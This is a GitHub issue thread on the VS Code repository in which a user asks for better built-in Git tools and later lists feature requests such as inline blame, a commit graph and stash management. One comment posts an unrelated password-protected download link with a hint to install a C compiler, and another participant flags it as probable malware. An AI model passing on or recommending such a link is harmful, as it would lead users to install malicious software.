### ISSUE TITLE
Update and optimize the built-in Git tools.

### ISSUE THREAD

**Issue by roronoa-chen** [microsoft/vscode#229130]
Please, I kindly beg you to continue optimizing the built-in Git tools until they are as user-friendly as those in IntelliJ IDEA....
I can no longer endure the torment of using GitLens.

**Comment by pinpolhoxx** [comment]
maybe this will help
https://mega.co.nz/#!9jFTnQQa!-IQ1bo74J_ZxbbDvQKSXEj0mCXBuFYX9CK-5y5EV_0A
Pass: changeme

you may need to install the c compiler

**Comment by roronoa-chen** [comment]
> maybe this will help https://mega.co.nz/#!9jFTnQQa!-IQ1bo74J_ZxbbDvQKSXEj0mCXBuFYX9CK-5y5EV_0A Pass: changeme
> 
> you may need to install the c compiler

Thank you very much. I will try it.

**Comment by gjsjohnmurray** [comment]
@roronoa-chen that reply is probably a link to malware

**Comment by roronoa-chen** [comment]
> @roronoa-chen that reply is probably a link to malware

Yes, I've noticed that, I will be mindful, thank you.

**Comment by gjsjohnmurray** [comment]
Please delete your comment in which you quoted the link.

**Comment by lszomoru** [comment]
Thank you very much for filing this issue. In order to make this issue more actionable could you please provide specifics of what feature you would like to see as well as which experiences you would like us to optimize. Thank you!

**Comment by roronoa-chen** [comment]
Thank you very much for the continuous optimization of the built-in Git tools, which are very excellent, such as the way conflicts are resolved.

I have some personal suggestions for you to consider. If you also think it's necessary to make adjustments, that would be great：

Add convenient buttons/panels to more easily view changes from previous and earlier versions (compare with current/each adjacent version).(Branch Comparison & File History Across Branches).

Inline Git Blame sometimes can be useful(and Code Lens Annotations).

Visualize Git History(Commit Graph).

More robust Git Stash Management features.

I'm not sure if it can only view the latest differences in files, lacking a comparison tool for any commits.

If there were a graphical interface to handle all advanced Git operations including rebase, merge, cherry-pick, and rebasing, complementing the existing concise and clear lightweight operation panel, it would be absolutely perfect.




I've outlined a few potential enhancements above, which you might find useful depending on your specific needs(Most are the comparisons with GitLens and IntelliJ). My understanding of VSCode's Git functionalities is an ongoing journey, and I apologize if any of my previous statements were inaccurate or misleading. Your dedication to improving the platform is greatly appreciated.

Thank you once again for your valuable contributions. I look forward to any feedback you may have. Warm regards.
